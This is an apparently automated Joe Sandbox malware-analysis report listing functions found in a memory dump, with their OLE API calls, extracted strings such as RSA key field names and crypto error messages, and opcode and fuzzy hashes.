Associated: 00000006.00000002.1929856472.000000006F870000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930274507.000000006F8F4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930391878.000000006F90E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930448908.000000006F910000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930475832.000000006F911000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930507288.000000006F913000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930629813.000000006F91E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f870000_907.jbxd

Similarity

API ID: ArrayDestroySafe
String ID: RSDi
API String ID: 4225690600-559181253
Opcode ID: 22b4cb34f8c53e084b2b246e56af3280aaa4867a9f91e7a6e677630c36de2c3e
Instruction ID: be59f2f562bb91e6cd9ddc5086ff776881d5ddf6fc1d780fddc2b412a42819b5
Opcode Fuzzy Hash: 22b4cb34f8c53e084b2b246e56af3280aaa4867a9f91e7a6e677630c36de2c3e
Instruction Fuzzy Hash: C5412A74A016189FDB04DFADCD80A9AB7BAAF89300F2089CAE519DB355DB35E841CF50

Uniqueness

Uniqueness Score: -1.00%

Function 6F890815 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 103COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6F8923B3
SafeArrayDestroy.OLEAUT32(?), ref: 6F8923C3
SafeArrayDestroy.OLEAUT32(?), ref: 6F8923D6
SafeArrayDestroy.OLEAUT32(?), ref: 6F8923E9
SafeArrayDestroy.OLEAUT32(?), ref: 6F8923FC
SafeArrayDestroy.OLEAUT32(?), ref: 6F89240F

Strings

RSUa, xrefs: 6F890864

Memory Dump Source

Source File: 00000006.00000002.1929893908.000000006F871000.00000020.00000001.01000000.00000009.sdmp, Offset: 6F870000, based on PE: true

Associated: 00000006.00000002.1929856472.000000006F870000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930274507.000000006F8F4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930391878.000000006F90E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930448908.000000006F910000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930475832.000000006F911000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930507288.000000006F913000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930629813.000000006F91E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f870000_907.jbxd

Similarity

API ID: ArrayDestroySafe
String ID: RSUa
API String ID: 4225690600-2086061799
Opcode ID: acbf048cadf4687d7fb9d6d1a99824e7c6de188399f38bebf66a499fe139a90f
Instruction ID: 94d40ddb0afe5c4f0c25327b0778f6958ad6bb59d0d67be5964668d86acd8a93
Opcode Fuzzy Hash: acbf048cadf4687d7fb9d6d1a99824e7c6de188399f38bebf66a499fe139a90f
Instruction Fuzzy Hash: E5310C70E006189FDB04DB6DCD80B9EB7B9AF89300F2089DAE519EB251D775E981CF50

Uniqueness

Uniqueness Score: -1.00%

Function 6F890787 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 103COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6F8923B3
SafeArrayDestroy.OLEAUT32(?), ref: 6F8923C3
SafeArrayDestroy.OLEAUT32(?), ref: 6F8923D6
SafeArrayDestroy.OLEAUT32(?), ref: 6F8923E9
SafeArrayDestroy.OLEAUT32(?), ref: 6F8923FC
SafeArrayDestroy.OLEAUT32(?), ref: 6F89240F

Strings

RSa, xrefs: 6F8907D6

Memory Dump Source

Source File: 00000006.00000002.1929893908.000000006F871000.00000020.00000001.01000000.00000009.sdmp, Offset: 6F870000, based on PE: true

Associated: 00000006.00000002.1929856472.000000006F870000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930274507.000000006F8F4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930391878.000000006F90E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930448908.000000006F910000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930475832.000000006F911000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930507288.000000006F913000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930629813.000000006F91E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f870000_907.jbxd

Similarity

API ID: ArrayDestroySafe
String ID: RSa
API String ID: 4225690600-3169278968
Opcode ID: 50291cd233c4ac1168e02ffca28eb86e69c346b96dbc23f6b305283d44f6c5b2
Instruction ID: 2ef50ed78dec4814433b9658362b4e5c521a16aca1642f34bcfd1ce0b6c1c707
Opcode Fuzzy Hash: 50291cd233c4ac1168e02ffca28eb86e69c346b96dbc23f6b305283d44f6c5b2
Instruction Fuzzy Hash: 7F311D70A006189FDB04DF6DCD80BADB7B9AF89310F2089DAE519EB251D775E941CF50

Uniqueness

Uniqueness Score: -1.00%

Function 6F8906F9 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 103COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6F8923B3
SafeArrayDestroy.OLEAUT32(?), ref: 6F8923C3
SafeArrayDestroy.OLEAUT32(?), ref: 6F8923D6
SafeArrayDestroy.OLEAUT32(?), ref: 6F8923E9
SafeArrayDestroy.OLEAUT32(?), ref: 6F8923FC
SafeArrayDestroy.OLEAUT32(?), ref: 6F89240F

Strings

RSqb, xrefs: 6F890748

Memory Dump Source

Source File: 00000006.00000002.1929893908.000000006F871000.00000020.00000001.01000000.00000009.sdmp, Offset: 6F870000, based on PE: true

Associated: 00000006.00000002.1929856472.000000006F870000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930274507.000000006F8F4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930391878.000000006F90E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930448908.000000006F910000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930475832.000000006F911000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930507288.000000006F913000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930629813.000000006F91E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f870000_907.jbxd

Similarity

API ID: ArrayDestroySafe
String ID: RSqb
API String ID: 4225690600-347567867
Opcode ID: e9b9cb5158a84d3d2c8abd744fd6cafbaaa09defdd6761000aed0baa76bf46ca
Instruction ID: 5f65670f28df644c0fd0eca733bd4cf2c119776e7696ae2314cee6bc174758c6
Opcode Fuzzy Hash: e9b9cb5158a84d3d2c8abd744fd6cafbaaa09defdd6761000aed0baa76bf46ca
Instruction Fuzzy Hash: C7310C70A006189FDB04DF6DCD80B9DB7B9AF89310F2089DAE519EB251DB75E941CF50

Uniqueness

Uniqueness Score: -1.00%

Function 6F890237 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 103COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6F8923B3
SafeArrayDestroy.OLEAUT32(?), ref: 6F8923C3
SafeArrayDestroy.OLEAUT32(?), ref: 6F8923D6
SafeArrayDestroy.OLEAUT32(?), ref: 6F8923E9
SafeArrayDestroy.OLEAUT32(?), ref: 6F8923FC
SafeArrayDestroy.OLEAUT32(?), ref: 6F89240F

Strings

RS3g, xrefs: 6F890286

Memory Dump Source

Source File: 00000006.00000002.1929893908.000000006F871000.00000020.00000001.01000000.00000009.sdmp, Offset: 6F870000, based on PE: true

Associated: 00000006.00000002.1929856472.000000006F870000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930274507.000000006F8F4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930391878.000000006F90E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930448908.000000006F910000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930475832.000000006F911000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930507288.000000006F913000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930629813.000000006F91E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f870000_907.jbxd

Similarity

API ID: ArrayDestroySafe
String ID: RS3g
API String ID: 4225690600-2794631155
Opcode ID: 1a888945c546c34c40be0d5ceb7621bf813493bafd724bb855592ee29c581a3e
Instruction ID: dc44f114efdbc2ca70b954edd7d641ee7b4a24a6d433f6e31cd18ec3509f2ec9
Opcode Fuzzy Hash: 1a888945c546c34c40be0d5ceb7621bf813493bafd724bb855592ee29c581a3e
Instruction Fuzzy Hash: F5312C70A006189FCB04DFACCD80B9DB7B9AF89300F208ADAE419EB255CB75E941CF50

Uniqueness

Uniqueness Score: -1.00%

Function 6F89012D Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 103COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6F8923B3
SafeArrayDestroy.OLEAUT32(?), ref: 6F8923C3
SafeArrayDestroy.OLEAUT32(?), ref: 6F8923D6
SafeArrayDestroy.OLEAUT32(?), ref: 6F8923E9
SafeArrayDestroy.OLEAUT32(?), ref: 6F8923FC
SafeArrayDestroy.OLEAUT32(?), ref: 6F89240F

Strings

RS:h, xrefs: 6F89017F

Memory Dump Source

Source File: 00000006.00000002.1929893908.000000006F871000.00000020.00000001.01000000.00000009.sdmp, Offset: 6F870000, based on PE: true

Associated: 00000006.00000002.1929856472.000000006F870000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930274507.000000006F8F4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930391878.000000006F90E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930448908.000000006F910000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930475832.000000006F911000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930507288.000000006F913000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930629813.000000006F91E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f870000_907.jbxd

Similarity

API ID: ArrayDestroySafe
String ID: RS:h
API String ID: 4225690600-3891202347
Opcode ID: 07ac03f6f655bbefab296aebad7d98372237f5c1dd76e4e57522280bd4a5b916
Instruction ID: 1be2a5606657c29e740af5946ca757d1457e7d8636f7087483943344df009f2e
Opcode Fuzzy Hash: 07ac03f6f655bbefab296aebad7d98372237f5c1dd76e4e57522280bd4a5b916
Instruction Fuzzy Hash: C9310C70E006189FDB14DF6DCD80B9EB7B9AF89300F2089DAE419EB255D775E941CB50

Uniqueness

Uniqueness Score: -1.00%

Function 6F8CC760 Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 95COMMON

Download Yara Rule

APIs

type_info::operator!=.LIBCMT ref: 6F8CC7EB

Strings

Prime1, xrefs: 6F8CC88A
MultiplicativeInverseOfPrime2ModPrime1, xrefs: 6F8CC815
ModPrime2PrivateExponent, xrefs: 6F8CC82C
PrivateExponent, xrefs: 6F8CC85F
Prime2, xrefs: 6F8CC876
ModPrime1PrivateExponent, xrefs: 6F8CC840

Memory Dump Source

Source File: 00000006.00000002.1929893908.000000006F871000.00000020.00000001.01000000.00000009.sdmp, Offset: 6F870000, based on PE: true

Associated: 00000006.00000002.1929856472.000000006F870000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930274507.000000006F8F4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930391878.000000006F90E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930448908.000000006F910000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930475832.000000006F911000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930507288.000000006F913000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930629813.000000006F91E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f870000_907.jbxd

Similarity

API ID: type_info::operator!=
String ID: ModPrime1PrivateExponent$ModPrime2PrivateExponent$MultiplicativeInverseOfPrime2ModPrime1$Prime1$Prime2$PrivateExponent
API String ID: 2241493438-339133643
Opcode ID: 9b83d14aeb3096a260ae159e7a2785f00225fd2d55b7fd010e0162ffaba484ca
Instruction ID: e0d11a4d3aa3e3a7d922af1eee04360b95cffeeb8ec99cbe5634e4c602b97382
Opcode Fuzzy Hash: 9b83d14aeb3096a260ae159e7a2785f00225fd2d55b7fd010e0162ffaba484ca
Instruction Fuzzy Hash: D2316A70A193449EC7049F7DC94554ABBE1AFD6248F414EAEF484AF3A4EB70D848CB87

Uniqueness

Uniqueness Score: -1.00%

Function 6F890457 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 94COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6F8923B3
SafeArrayDestroy.OLEAUT32(?), ref: 6F8923C3
SafeArrayDestroy.OLEAUT32(?), ref: 6F8923D6
SafeArrayDestroy.OLEAUT32(?), ref: 6F8923E9
SafeArrayDestroy.OLEAUT32(?), ref: 6F8923FC
SafeArrayDestroy.OLEAUT32(?), ref: 6F89240F

Strings

RS%e, xrefs: 6F890494

Memory Dump Source

Source File: 00000006.00000002.1929893908.000000006F871000.00000020.00000001.01000000.00000009.sdmp, Offset: 6F870000, based on PE: true

Associated: 00000006.00000002.1929856472.000000006F870000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930274507.000000006F8F4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930391878.000000006F90E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930448908.000000006F910000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930475832.000000006F911000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930507288.000000006F913000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930629813.000000006F91E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f870000_907.jbxd

Similarity

API ID: ArrayDestroySafe
String ID: RS%e
API String ID: 4225690600-1409579784
Opcode ID: 6272c1548e4ebb51ffadaf49bdca00ba0f7037eaa3f70576b0b89088eb133738
Instruction ID: 557e6ec24574d9b54abe71c46bbed0a45ff829e7f39889e5a1ea3b3e336780d5
Opcode Fuzzy Hash: 6272c1548e4ebb51ffadaf49bdca00ba0f7037eaa3f70576b0b89088eb133738
Instruction Fuzzy Hash: A1313E70E006189FDB14DBADCC80B9DB7B9AF85300F2489DAE519EB252C775E941CF50

Uniqueness

Uniqueness Score: -1.00%

Function 6F88AA00 Relevance: 12.3, APIs: 8, Instructions: 309COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 6F88AA54
VariantInit.OLEAUT32(?), ref: 6F88AA5B
VariantInit.OLEAUT32(?), ref: 6F88AA62
VariantInit.OLEAUT32(?), ref: 6F88AA69
VariantClear.OLEAUT32(?), ref: 6F88ACF2
VariantClear.OLEAUT32(?), ref: 6F88ACF9
VariantClear.OLEAUT32(?), ref: 6F88AD00
VariantClear.OLEAUT32(?), ref: 6F88AD07

Memory Dump Source

Source File: 00000006.00000002.1929893908.000000006F871000.00000020.00000001.01000000.00000009.sdmp, Offset: 6F870000, based on PE: true

Associated: 00000006.00000002.1929856472.000000006F870000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930274507.000000006F8F4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930391878.000000006F90E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930448908.000000006F910000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930475832.000000006F911000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930507288.000000006F913000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930629813.000000006F91E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f870000_907.jbxd

Similarity

API ID: Variant$ClearInit
String ID:
API String ID: 2610073882-0
Opcode ID: 087b5c26d901addeaf67099cbaec7fb33df1590addcecc80293790bc30753599
Instruction ID: 0f519087d7f4e795541a12e476c846366b53ada3d5b3295ea4e050d29edf986d
Opcode Fuzzy Hash: 087b5c26d901addeaf67099cbaec7fb33df1590addcecc80293790bc30753599
Instruction Fuzzy Hash: B2C13971608701AFC304DF68C88095AB7E6FFC9304F248E9EF5A59B2A5D735E845CB92

Uniqueness

Uniqueness Score: -1.00%

Function 6F889D00 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 326COMMON

Download Yara Rule

APIs

SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6F889DEB
SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6F889DFB
SafeArrayGetElement.OLEAUT32(?,?,?), ref: 6F889E29
SafeArrayDestroy.OLEAUT32(?), ref: 6F889F25
VariantClear.OLEAUT32(?), ref: 6F889FE5

Strings

@, xrefs: 6F889DD7

Memory Dump Source

Source File: 00000006.00000002.1929893908.000000006F871000.00000020.00000001.01000000.00000009.sdmp, Offset: 6F870000, based on PE: true

Associated: 00000006.00000002.1929856472.000000006F870000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930274507.000000006F8F4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930391878.000000006F90E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930448908.000000006F910000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930475832.000000006F911000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930507288.000000006F913000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930629813.000000006F91E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f870000_907.jbxd

Similarity

API ID: ArraySafe$Bound$ClearDestroyElementVariant
String ID: @
API String ID: 3214203402-2766056989
Opcode ID: 87924825d1aef11983ef03db2cc04d469bacad08d030bbd9059c88ad13a553d6
Instruction ID: 59fc6a63619b91801072aea0c0c8b1bbc63b161b5654797efd234ac4fe043210
Opcode Fuzzy Hash: 87924825d1aef11983ef03db2cc04d469bacad08d030bbd9059c88ad13a553d6
Instruction Fuzzy Hash: E2D17A71D00249DFDB04CFA8C980A9DBBB5BF88704F24899EE525AF284D771AA45CF90

Uniqueness

Uniqueness Score: -1.00%

Function 6F88B300 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 326COMMON

Download Yara Rule

APIs

SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6F88B3EB
SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6F88B3FB
SafeArrayGetElement.OLEAUT32(?,?,?), ref: 6F88B429
SafeArrayDestroy.OLEAUT32(?), ref: 6F88B525
VariantClear.OLEAUT32(?), ref: 6F88B5E5

Strings

@, xrefs: 6F88B3D7

Memory Dump Source

Source File: 00000006.00000002.1929893908.000000006F871000.00000020.00000001.01000000.00000009.sdmp, Offset: 6F870000, based on PE: true

Associated: 00000006.00000002.1929856472.000000006F870000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930274507.000000006F8F4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930391878.000000006F90E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930448908.000000006F910000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930475832.000000006F911000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930507288.000000006F913000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930629813.000000006F91E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f870000_907.jbxd

Similarity

API ID: ArraySafe$Bound$ClearDestroyElementVariant
String ID: @
API String ID: 3214203402-2766056989
Opcode ID: 5a253177e8d599bba98a0fcea890c3d55661132fd7892b6154b8a249068a9cd2
Instruction ID: 1b331c3f16fead85fe7290cfa87fdababcbc36ba2be329750c85967c82961f3b
Opcode Fuzzy Hash: 5a253177e8d599bba98a0fcea890c3d55661132fd7892b6154b8a249068a9cd2
Instruction Fuzzy Hash: BBD17B71D00249DFDB04DFA8C980A9DBBB5FF88314F24899EE525AF355D730AA45CB90

Uniqueness

Uniqueness Score: -1.00%

Function 6F8B1580 Relevance: 10.8, APIs: 2, Strings: 4, Instructions: 277COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBCMT ref: 6F8B16B2

Part of subcall function 6F8DAC75: RaiseException.KERNEL32(?,?,6F8D9C34,8E16AAE4,?,?,?,?,6F8D9C34,8E16AAE4,6F909C90,6F91B974,8E16AAE4), ref: 6F8DACB7

__CxxThrowException@8.LIBCMT ref: 6F8B180A

Part of subcall function 6F874010: std::_Xinvalid_argument.LIBCPMT ref: 6F87402A

Strings

: message length of , xrefs: 6F8B170D
: this key is too short to encrypt any messages, xrefs: 6F8B162A
for this public key, xrefs: 6F8B1771
exceeds the maximum of , xrefs: 6F8B173F

Memory Dump Source

Source File: 00000006.00000002.1929893908.000000006F871000.00000020.00000001.01000000.00000009.sdmp, Offset: 6F870000, based on PE: true

Associated: 00000006.00000002.1929856472.000000006F870000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930274507.000000006F8F4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930391878.000000006F90E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930448908.000000006F910000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930475832.000000006F911000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930507288.000000006F913000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930629813.000000006F91E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f870000_907.jbxd

Similarity

API ID: Exception@8Throw$ExceptionRaiseXinvalid_argumentstd::_
String ID: exceeds the maximum of $ for this public key$: message length of $: this key is too short to encrypt any messages
API String ID: 3807434085-412673420
Opcode ID: 80a86bf16b6b18cce28247489be5883e33ba24bf704ec22c3a4acee748698606
Instruction ID: 8071a0e3e0b65e508616db051f960021c78b91a6170f955ab0c528605cdf48be
Opcode Fuzzy Hash: 80a86bf16b6b18cce28247489be5883e33ba24bf704ec22c3a4acee748698606
Instruction Fuzzy Hash: 04B14B71508380AFD320DB68C890B9BB7E9AFD9314F148D5DE59D8B391DB31A905CBA3

Uniqueness

Uniqueness Score: -1.00%

Function 6F8D13A0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 129COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 6F8D13BE

Part of subcall function 6F8D90D8: std::exception::exception.LIBCMT ref: 6F8D90ED
Part of subcall function 6F8D90D8: __CxxThrowException@8.LIBCMT ref: 6F8D9102
Part of subcall function 6F8D90D8: std::exception::exception.LIBCMT ref: 6F8D9113

_memmove.LIBCMT ref: 6F8D1431
_memmove.LIBCMT ref: 6F8D1456
_memmove.LIBCMT ref: 6F8D1493
_memmove.LIBCMT ref: 6F8D14B0

Strings

deque<T> too long, xrefs: 6F8D13B9

Memory Dump Source

Source File: 00000006.00000002.1929893908.000000006F871000.00000020.00000001.01000000.00000009.sdmp, Offset: 6F870000, based on PE: true

Associated: 00000006.00000002.1929856472.000000006F870000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930274507.000000006F8F4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930391878.000000006F90E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930448908.000000006F910000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930475832.000000006F911000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930507288.000000006F913000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930629813.000000006F91E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f870000_907.jbxd

Similarity

API ID: _memmove$std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_
String ID: deque<T> too long
API String ID: 4034224661-309773918
Opcode ID: 4ef34cb037b8012976eebbd01d202a21a671c1972a3eedcadf3f9353d916a586
Instruction ID: 84bf54af90fc890071cabf0314b4e4fd9a4d524d145f1072718441dd30bf6ac1
Opcode Fuzzy Hash: 4ef34cb037b8012976eebbd01d202a21a671c1972a3eedcadf3f9353d916a586
Instruction Fuzzy Hash: C241E6B2A042045BD708CE28DC9196BB7E7EFC4214F098A6DF849DB749EA34ED05C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 6F8D1250 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 129COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 6F8D126E

Part of subcall function 6F8D90D8: std::exception::exception.LIBCMT ref: 6F8D90ED
Part of subcall function 6F8D90D8: __CxxThrowException@8.LIBCMT ref: 6F8D9102
Part of subcall function 6F8D90D8: std::exception::exception.LIBCMT ref: 6F8D9113

_memmove.LIBCMT ref: 6F8D12E0
_memmove.LIBCMT ref: 6F8D1305
_memmove.LIBCMT ref: 6F8D1342
_memmove.LIBCMT ref: 6F8D135F

Strings

deque<T> too long, xrefs: 6F8D1269

Memory Dump Source

Source File: 00000006.00000002.1929893908.000000006F871000.00000020.00000001.01000000.00000009.sdmp, Offset: 6F870000, based on PE: true

